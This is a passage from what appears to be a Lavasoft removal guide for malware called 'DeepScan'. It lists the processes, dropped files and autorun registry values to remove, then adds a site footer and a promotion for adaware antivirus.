    systemHome.exe:3056
    systemHome.exe:2432
    wget.exe:2524
    wget.exe:2512
    xdhgfg.exe:928

  2. Delete the original DeepScan file.
  3. Delete or disinfect the following files created/modified by the DeepScan:

    C:\Windows\sysiaop.exe (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe (155 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe (73 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe (304 bytes)
    C:\Windows\WindowsUpdate\kuxmbedujme.exe (32192 bytes)
    C:\Windows\WindowsUpdate\xdhgfg.exe (33404 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (1070 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "FuckTheWannaCry" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "kuxmbedujme.exe" = "C:\Windows\WindowsUpdate\kuxmbedujme.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "xdhgfg.exe" = "C:\Windows\WindowsUpdate\xdhgfg.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now